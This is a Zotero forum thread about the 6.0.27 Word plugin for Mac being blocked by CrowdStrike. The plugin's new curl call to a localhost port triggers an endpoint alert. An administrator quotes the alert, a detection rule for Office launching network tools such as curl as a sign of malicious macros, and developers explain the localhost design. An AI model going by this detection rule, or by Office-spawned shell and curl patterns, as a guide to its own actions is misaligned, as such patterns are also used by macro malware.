Word for Mac closes when using Zotero 6.0.27 plugin [caused by CrowdStrike antivirus software]
This discussion was created from comments split from: Word (Mac) crashes when adding Footnote (Report ID: 197542060).
Latest update: https://forums.zotero.org/discussion/comment/443522/#Comment_443522
Latest update: https://forums.zotero.org/discussion/comment/443522/#Comment_443522
https://forums.zotero.org/discussion/comment/442907/#Comment_442907
Reverting to 6.0.26 did not work. Word 16.76.1. M2 Macbook Air on 13.4.1 but it happened on an older OS version too.
Can't replicate this on an Intel Mac on 13.5.1
Thanks for the quick fix!
, and while we've temporarily pulled 6.0.27 due to this problem with CrowdStrike, we do need to put 6.0.27 back out soon.[Update: This has been fixed by CrowdStrike, as noted below, and we've re-released 6.0.27. If you're still seeing this, ask your IT department to update CrowdStrike to allow this. Staying on 6.0.26 isn't an permanent fix.]
I see you are now using Curl to make the http request between the plugin and the Zotero app. It looks like this new method is what is being deemed a risk by various AV products.
I will post the information from our alerts here for context as to why it is being seen as a security risk:
SuspiciousOfficeActivity
Microsoft Office runs a number software child processes on the regular. This analytic looks for some of the ones used frequently in attacks that do not occur regularly under the Office suite implying a malicious Office macro may have been executed.
curl (8974)
Process Arguments
curl -s -o /dev/null -I -w %{http_code} -X GET http://127.0.0.1:23119/integration/macWordCommand?agent=MacWord16&command=addEditCitation&document=/Applications/Microsoft Word.app/&templateVersion=2
bash (8973)
Process Arguments
sh -c curl -s -o /dev/null -I -w '%{http_code}' -X GET 'http://127.0.0.1:23119/integration/macWordCommand?agent=MacWord16&command=addEditCitation&document=/Applications/Microsoft Word.app/&templateVersion [26 characters truncated]
We have stopped updating Zotero to this latest version due to these many alerts we receive multiple times per user on version 6.27.
I could create a rule in our AV to exempt these alerts, but this would be for any alerts triggered by the curl command. Not something I feel comfortable doing.
I would suggest maybe revisiting the changes you have made to the way the plugin works. It concerns me that this is the way forward since it appears to be a method used by malware developers and Apple/AV view it as a risk.
Unfortunately we just don't currently have an alternative here. macOS Sonoma makes app-sandboxing changes that prevent the previous Word-to-Zotero communication method from working without triggering a permissions prompt every single time you start Zotero, with no way to allow it permanently. That's just not an acceptable user experience, so communicating via HTTP to localhost is the only option. And we can't detect the macOS version from within Word, so we need to switch to this method for all macOS versions.
You should report this to Jamf. Having default detectors flag an unexpected process call is fine, but they obviously should be able to allow exceptions at a more granular level than the process name. There's nothing dangerous or unusual about using localhost HTTP for IPC.
We're working with Microsoft to improve a new Word API so that we can offer a new, greatly improved version of the plugin, which among other things should eliminate the need for the curl call (though it will still use localhost HTTP). That likely won't be available until next year, though.